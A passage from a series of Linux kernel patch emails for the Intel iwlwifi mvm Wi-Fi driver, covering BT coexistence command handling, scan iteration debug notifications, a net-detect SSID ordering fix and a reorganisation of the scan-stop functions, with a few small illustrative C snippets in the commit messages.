- * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2013 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -408,23 +408,12 @@ iwl_get_coex_type(struct iwl_mvm *mvm, const struct ieee80211_vif *vif) int iwl_send_bt_init_conf(struct iwl_mvm *mvm) { - struct iwl_bt_coex_cmd *bt_cmd; - struct iwl_host_cmd cmd = { - .id = BT_CONFIG, - .len = { sizeof(*bt_cmd), }, - .dataflags = { IWL_HCMD_DFL_NOCOPY, }, - }; - int ret; + struct iwl_bt_coex_cmd bt_cmd = {}; u32 mode; if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_send_bt_init_conf_old(mvm); - bt_cmd = kzalloc(sizeof(*bt_cmd), GFP_KERNEL); - if (!bt_cmd) - return -ENOMEM; - cmd.data[0] = bt_cmd; - lockdep_assert_held(&mvm->mutex); if (unlikely(mvm->bt_force_ant_mode != BT_FORCE_ANT_DIS)) { @@ -440,36 +429,33 @@ int iwl_send_bt_init_conf(struct iwl_mvm *mvm) mode = 0; } - bt_cmd->mode = cpu_to_le32(mode); + bt_cmd.mode = cpu_to_le32(mode); goto send_cmd; } mode = iwlwifi_mod_params.bt_coex_active ? BT_COEX_NW : BT_COEX_DISABLE; - bt_cmd->mode = cpu_to_le32(mode); + bt_cmd.mode = cpu_to_le32(mode); if (IWL_MVM_BT_COEX_SYNC2SCO) - bt_cmd->enabled_modules |= + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_SYNC2SCO_ENABLED); if (iwl_mvm_bt_is_plcr_supported(mvm)) - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_CORUN_ENABLED); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_CORUN_ENABLED); if (IWL_MVM_BT_COEX_MPLUT) { - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_ENABLED); - bt_cmd->enabled_modules |= + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_ENABLED); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_BOOST_ENABLED); } - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_HIGH_BAND_RET); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_HIGH_BAND_RET); send_cmd: memset(&mvm->last_bt_notif, 0, sizeof(mvm->last_bt_notif)); memset(&mvm->last_bt_ci_cmd, 0, sizeof(mvm->last_bt_ci_cmd)); - ret = iwl_mvm_send_cmd(mvm, &cmd); - - kfree(bt_cmd); - return ret; + return iwl_mvm_send_cmd_pdu(mvm, BT_CONFIG, 0, sizeof(bt_cmd), &bt_cmd); } static int iwl_mvm_bt_coex_reduced_txp(struct iwl_mvm *mvm, u8 sta_id, From 1fa1bcc02c158bc8a802907cc01dfa33663ec16c Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Tue, 31 Mar 2015 16:22:33 +0300 Subject: [PATCH 375/872] iwlwifi: mvm: print scanned channel list on scan iteration complete notification When receiving scan iteration complete notification, print a list of the channels that have been scanned in this iteration. This is useful for debugging. 
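For reference, the bounded formatting this relies on can be modelled with a small stand-alone program; the function name, channel numbers and buffer size below are illustrative stand-ins, not the driver's definitions:

    #include <stdio.h>

    /* Format up to 'num' channel numbers into a fixed-size buffer, stopping
     * once the buffer is exhausted and always NUL-terminating. */
    static char *dump_channel_list(const unsigned int *channels, int num,
                                   char *buf, size_t buf_size)
    {
            char *pos = buf, *end = buf + buf_size;
            int i;

            buf[0] = '\0';
            for (i = 0; pos < end && i < num; i++)
                    pos += snprintf(pos, end - pos, " %u", channels[i]);

            /* terminate the string in case the buffer was too short */
            buf[buf_size - 1] = '\0';
            return buf;
    }

    int main(void)
    {
            unsigned int channels[] = { 1, 6, 11, 36, 40 };
            char buf[32];

            printf("scanned channels:%s\n",
                   dump_channel_list(channels, 5, buf, sizeof(buf)));
            return 0;
    }

This pattern keeps the debug print safe even when more channels were scanned than the buffer can describe.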
Signed-off-by: Avraham Stern Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 23 +++++++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 7777d56cbb60..e859584f0f35 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -312,16 +312,35 @@ int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm) return max_ie_len; } +static u8 *iwl_mvm_dump_channel_list(struct iwl_scan_results_notif *res, + int num_res, u8 *buf, size_t buf_size) +{ + int i; + u8 *pos = buf, *end = buf + buf_size; + + for (i = 0; pos < end && i < num_res; i++) + pos += snprintf(pos, end - pos, " %u", res[i].channel); + + /* terminate the string in case the buffer was too short */ + *(buf + buf_size - 1) = '\0'; + + return buf; +} + int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_lmac_scan_complete_notif *notif = (void *)pkt->data; + u8 buf[256]; IWL_DEBUG_SCAN(mvm, - "Scan offload iteration complete: status=0x%x scanned channels=%d\n", - notif->status, notif->scanned_channels); + "Scan offload iteration complete: status=0x%x scanned channels=%d channels list: %s\n", + notif->status, notif->scanned_channels, + iwl_mvm_dump_channel_list(notif->results, + notif->scanned_channels, buf, + sizeof(buf))); return 0; } From ee9219b2c268b228c0494c98259401e665457b87 Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Mon, 23 Mar 2015 15:09:27 +0200 Subject: [PATCH 376/872] iwlwifi: mvm: add UMAC scan iteration complete notification Add UMAC scan iteration complete notification. This notification can be enabled by setting scan_iter_notif_enabled through debugfs. Upon receiving this notification, print the list of channels that have been scanned in this iteration. This is useful for debugging. 
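As a rough, host-endian model of how such a variable-length notification is laid out and consumed (the struct and values below are simplified stand-ins, not the firmware API definition):

    #include <stdio.h>
    #include <stdlib.h>

    struct result { unsigned char channel; };

    /* fixed header followed by 'scanned_channels' result entries */
    struct iter_complete_notif {
            unsigned int uid;
            unsigned char scanned_channels;
            unsigned char status;
            struct result results[];
    };

    int main(void)
    {
            unsigned char chans[] = { 1, 6, 11 };
            struct iter_complete_notif *n;
            int i;

            n = malloc(sizeof(*n) + 3 * sizeof(struct result));
            if (!n)
                    return 1;

            n->uid = 0;
            n->scanned_channels = 3;
            n->status = 0;
            for (i = 0; i < 3; i++)
                    n->results[i].channel = chans[i];

            printf("uid=%u scanned=%d:", n->uid, n->scanned_channels);
            for (i = 0; i < n->scanned_channels; i++)
                    printf(" %d", n->results[i].channel);
            printf("\n");

            free(n);
            return 0;
    }

Only the first scanned_channels entries of the trailing array are meaningful, which is why the count travels in the header.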
Signed-off-by: Avraham Stern Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 23 +++++++++++++++++++ drivers/net/wireless/iwlwifi/mvm/fw-api.h | 5 ++-- drivers/net/wireless/iwlwifi/mvm/mvm.h | 3 +++ drivers/net/wireless/iwlwifi/mvm/ops.c | 3 +++ drivers/net/wireless/iwlwifi/mvm/scan.c | 21 +++++++++++++++++ 5 files changed, 53 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index be1a0a127077..022869323ca9 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -837,4 +837,27 @@ struct iwl_scan_offload_profiles_query { struct iwl_scan_offload_profile_match matches[IWL_SCAN_MAX_PROFILES]; } __packed; /* SCAN_OFFLOAD_PROFILES_QUERY_RSP_S_VER_2 */ +/** + * struct iwl_umac_scan_iter_complete_notif - notifies end of scanning iteration + * @uid: scan id, &enum iwl_umac_scan_uid_offsets + * @scanned_channels: number of channels scanned and number of valid elements in + * results array + * @status: one of SCAN_COMP_STATUS_* + * @bt_status: BT on/off status + * @last_channel: last channel that was scanned + * @tsf_low: TSF timer (lower half) in usecs + * @tsf_high: TSF timer (higher half) in usecs + * @results: array of scan results, only "scanned_channels" of them are valid + */ +struct iwl_umac_scan_iter_complete_notif { + __le32 uid; + u8 scanned_channels; + u8 status; + u8 bt_status; + u8 last_channel; + __le32 tsf_low; + __le32 tsf_high; + struct iwl_scan_results_notif results[]; +} __packed; /* SCAN_ITER_COMPLETE_NTF_UMAC_API_S_VER_1 */ + #endif diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 56db2ba52da0..0ed7675eff31 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -108,6 +108,7 @@ enum { ANTENNA_COUPLING_NOTIFICATION = 0xa, /* UMAC scan commands */ + SCAN_ITERATION_COMPLETE_UMAC = 0xb5, SCAN_CFG_CMD = 0xc, SCAN_REQ_UMAC = 0xd, SCAN_ABORT_UMAC = 0xe, diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index dde83efd1a6c..d4e0cabba23c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1150,6 +1150,9 @@ int iwl_mvm_config_scan(struct iwl_mvm *mvm); int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); +int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); /* MVM debugfs */ #ifdef CONFIG_IWLWIFI_DEBUGFS diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 534a9fd8fcbd..4935caf6543f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -245,6 +245,8 @@ static const struct iwl_rx_handlers iwl_mvm_rx_handlers[] = { false), RX_HANDLER(SCAN_COMPLETE_UMAC, iwl_mvm_rx_umac_scan_complete_notif, true), + RX_HANDLER(SCAN_ITERATION_COMPLETE_UMAC, + iwl_mvm_rx_umac_scan_iter_complete_notif, false), RX_HANDLER(CARD_STATE_NOTIFICATION, iwl_mvm_rx_card_state_notif, false), @@ -356,6 +358,7 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(TDLS_CHANNEL_SWITCH_NOTIFICATION), CMD(TDLS_CONFIG_CMD), CMD(MCC_UPDATE_CMD), + CMD(SCAN_ITERATION_COMPLETE_UMAC), }; #undef CMD diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e859584f0f35..81ea9f46365f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1181,6 +1181,10 @@ static u32 iwl_mvm_scan_umac_flags(struct iwl_mvm *mvm, if (iwl_mvm_scan_total_iterations(params) > 1) flags |= IWL_UMAC_SCAN_GEN_FLAGS_PERIODIC; +#ifdef CONFIG_IWLWIFI_DEBUGFS + if (mvm->scan_iter_notif_enabled) + flags |= IWL_UMAC_SCAN_GEN_FLAGS_ITER_COMPLETE; +#endif return flags; } @@ -1522,6 +1526,23 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, return 0; } +int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) +{ + struct iwl_rx_packet *pkt = rxb_addr(rxb); + struct iwl_umac_scan_iter_complete_notif *notif = (void *)pkt->data; + u8 buf[256]; + + IWL_DEBUG_SCAN(mvm, + "UMAC Scan iteration complete: status=0x%x scanned_channels=%d channels list: %s\n", + notif->status, notif->scanned_channels, + iwl_mvm_dump_channel_list(notif->results, + notif->scanned_channels, buf, + sizeof(buf))); + return 0; +} + static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, struct iwl_rx_packet *pkt, void *data) { From ae90c2e5784b465d903106d833afab4f3e139d80 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Wed, 6 May 2015 10:45:42 +0300 Subject: [PATCH 377/872] iwlwifi: mvm: fix the net-detect SSIDs report order After the scan refactor, the order of the SSIDs passed to the firmware in all scans (including net-detect) are inverted. This was causing the reporting code to use the wrong SSIDs. To fix this, invert the array index when accessing the saved match SSIDs to report the wake-up. 
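A minimal stand-alone illustration of that inversion, with made-up SSID names:

    #include <stdio.h>

    int main(void)
    {
            const char *nd_match_sets[] = { "ssid-A", "ssid-B", "ssid-C" };
            int n = 3, i;

            for (i = 0; i < n; i++) {
                    /* the firmware reported a match on index i; the driver's
                     * saved match sets are in the opposite order */
                    int idx = n - i - 1;

                    printf("fw match %d -> driver match set %d (%s)\n",
                           i, idx, nd_match_sets[idx]);
            }
            return 0;
    }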
Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index d30f168dcafe..408b0ce42dde 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1785,7 +1785,7 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, for_each_set_bit(i, &matched_profiles, mvm->n_nd_match_sets) { struct iwl_scan_offload_profile_match *fw_match; struct cfg80211_wowlan_nd_match *match; - int n_channels = 0; + int idx, n_channels = 0; fw_match = &query.matches[i]; @@ -1800,8 +1800,12 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, net_detect->matches[net_detect->n_matches++] = match; - match->ssid.ssid_len = mvm->nd_match_sets[i].ssid.ssid_len; - memcpy(match->ssid.ssid, mvm->nd_match_sets[i].ssid.ssid, + /* We inverted the order of the SSIDs in the scan + * request, so invert the index here. + */ + idx = mvm->n_nd_match_sets - i - 1; + match->ssid.ssid_len = mvm->nd_match_sets[idx].ssid.ssid_len; + memcpy(match->ssid.ssid, mvm->nd_match_sets[idx].ssid.ssid, match->ssid.ssid_len); if (mvm->n_nd_channels < n_channels) From 416c9b50647bc8ac22cb16e3062076f68dafebfe Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 11:32:29 +0300 Subject: [PATCH 378/872] iwlwifi: mvm: make iwl_mvm_config_sched_scan_profiles() static The iwl_mvm_config_sched_scan_profiles() function is only used in scan.c, so remove the declaration from mvm.h and make it static. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mvm.h | 2 -- drivers/net/wireless/iwlwifi/mvm/scan.c | 5 +++-- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index d4e0cabba23c..46668ef2df91 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1133,8 +1133,6 @@ int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); -int iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, - struct cfg80211_sched_scan_request *req); int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_sched_scan_request *req, diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 81ea9f46365f..443562c4ca3e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -476,8 +476,9 @@ static void iwl_scan_build_ssids(struct iwl_mvm_scan_params *params, } } -int iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, - struct cfg80211_sched_scan_request *req) +static int +iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, + struct cfg80211_sched_scan_request *req) { struct iwl_scan_offload_profile *profile; struct iwl_scan_offload_profile_cfg *profile_cfg; From cb97e415737f524b73b4e0c4475182b313c83bd8 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Sat, 16 May 2015 22:47:56 +0300 Subject: [PATCH 379/872] iwlwifi: mvm: BT Coex - fix shared antenna check with new API The commit below fixed this for the old firmware API only. 
Since the new firmware API hasn't been released yet, this doesn't fix anything on currently existing firmwares. This completes: commit afcee962b09842d0f4191beb4a2d08251b4c7705 Author: Eyal Shapira Date: Mon Feb 9 15:18:17 2015 +0200 iwlwifi: mvm: fix BT coex shared antenna activity check type=bugfix bug=not-tracked fixes=unknown Reviewed-by: Eyal Shapira Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index a9908865b660..662fa9c09624 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -886,7 +886,7 @@ bool iwl_mvm_bt_coex_is_shared_ant_avail(struct iwl_mvm *mvm) if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); - return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) == BT_OFF; + return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < BT_HIGH_TRAFFIC; } bool iwl_mvm_bt_coex_is_tpc_allowed(struct iwl_mvm *mvm, From 62a6b9c8c9483205124f52e35dd5af43eebe3a16 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 21 Apr 2015 13:34:10 +0300 Subject: [PATCH 380/872] iwlwifi: mvm: reorganize scan stopping functions The iwl_mvm_scan_offload_stop() function is used to stop LMAC regular scan, stop LMAC scheduled scan and stop UMAC scheduled scans (but not UMAC regular scans), making it very difficult to read. Reorganize the scan stopping functions by creating separate functions to stop regular and scheduled scans, separating the LMAC stopping part of the code from the rest and renaming the offload_stop function to iwl_mvm_lmac_scan_stop(). Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 10 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 4 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 101 ++++++++++---------- 4 files changed, 59 insertions(+), 58 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 408b0ce42dde..ceffc78ff15b 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -761,7 +761,7 @@ void iwl_mvm_set_last_nonqos_seq(struct iwl_mvm *mvm, struct ieee80211_vif *vif) static int iwl_mvm_switch_to_d3(struct iwl_mvm *mvm) { - iwl_mvm_cancel_scan(mvm); + iwl_mvm_reg_scan_stop(mvm); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index d13138e51686..13469315ed33 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2360,8 +2360,10 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); - if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) - iwl_mvm_scan_offload_stop(mvm, true); + if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) { + iwl_mvm_sched_scan_stop(mvm, true); + iwl_mvm_reg_scan_stop(mvm); + } switch (vif->type) { case NL80211_IFTYPE_STATION: @@ -2417,7 +2419,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, */ if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) - iwl_mvm_cancel_scan(mvm); + iwl_mvm_reg_scan_stop(mvm); mutex_unlock(&mvm->mutex); } @@ -2775,7 +2777,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, 
return 0; } - ret = iwl_mvm_scan_offload_stop(mvm, false); + ret = iwl_mvm_sched_scan_stop(mvm, false); mutex_unlock(&mvm->mutex); iwl_mvm_wait_for_async_handlers(mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 46668ef2df91..71b776358dc0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1122,7 +1122,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_scan_request *req, struct ieee80211_scan_ies *ies); int iwl_mvm_scan_size(struct iwl_mvm *mvm); -int iwl_mvm_cancel_scan(struct iwl_mvm *mvm); +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm); int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); @@ -1138,7 +1138,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); -int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify); +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 443562c4ca3e..579b36b0fecb 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -567,12 +567,6 @@ static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) }; u32 status; - /* Exit instantly with error when device is not ready - * to receive scan abort command or it does not perform - * scheduled scan currently */ - if (!mvm->scan_status) - return -EIO; - ret = iwl_mvm_send_cmd_status(mvm, &cmd, &status); if (ret) return ret; @@ -592,30 +586,15 @@ static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) return ret; } -int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) +static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) { int ret; struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_OFFLOAD_COMPLETE, }; - bool sched = !!(mvm->scan_status & IWL_MVM_SCAN_SCHED); + bool sched = type & IWL_MVM_SCAN_SCHED; lockdep_assert_held(&mvm->mutex); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); - - /* FIXME: For now we only check if no scan is set here, since - * we only support LMAC in this flow and it doesn't support - * multiple scans. - */ - if (!mvm->scan_status) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), @@ -634,27 +613,6 @@ int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); out: - /* Clear the scan status so the next scan requests will - * succeed and mark the scan as stopping, so that the Rx - * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. 
- */ - if (mvm->scan_status == IWL_MVM_SCAN_REGULAR) - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - - if (sched) { - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; - if (notify) - ieee80211_sched_scan_stopped(mvm->hw); - } else { - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; - if (notify) - ieee80211_scan_completed(mvm->hw, true); - } - return ret; } @@ -927,8 +885,10 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) { + int ret; + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); @@ -936,13 +896,52 @@ int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) return 0; if (iwl_mvm_is_radio_killed(mvm)) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ret = 0; + goto out; + } + + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; +out: + /* Clear the scan status so the next scan requests will + * succeed and mark the scan as stopping, so that the Rx + * handler doesn't do anything, as the scan was stopped from + * above. Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + + mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ieee80211_scan_completed(mvm->hw, true); + + return ret; +} + +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) +{ + int ret; + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); + + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; } - return iwl_mvm_scan_offload_stop(mvm, true); + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; +out: + mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; + if (notify) + ieee80211_sched_scan_stopped(mvm->hw); + + return ret; } /* UMAC scan API */ @@ -1275,11 +1274,11 @@ static int iwl_mvm_check_running_scans(struct iwl_mvm *mvm, int type) case IWL_MVM_SCAN_REGULAR: if (mvm->scan_status & IWL_MVM_SCAN_REGULAR_MASK) return -EBUSY; - return iwl_mvm_scan_offload_stop(mvm, true); + return iwl_mvm_sched_scan_stop(mvm, true); case IWL_MVM_SCAN_SCHED: if (mvm->scan_status & IWL_MVM_SCAN_SCHED_MASK) return -EBUSY; - return iwl_mvm_cancel_scan(mvm); + return iwl_mvm_reg_scan_stop(mvm); case IWL_MVM_SCAN_NETDETECT: /* No need to stop anything for net-detect since the * firmware is restarted anyway. This way, any sched From 7576d54f9e372dbbe77c5291e15a67296d502674 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 12 May 2015 09:30:36 +0300 Subject: [PATCH 381/872] iwlwifi: mvm: don't stop regular scans when going out of idle state It is not necessary to stop regular scans when going out of idle state. Previously, we were doing so for LMAC scans because the iwl_mvm_scan_offload_stop() function was stopping both kinds of scans. Now that we have more granularity, we can skip it. 
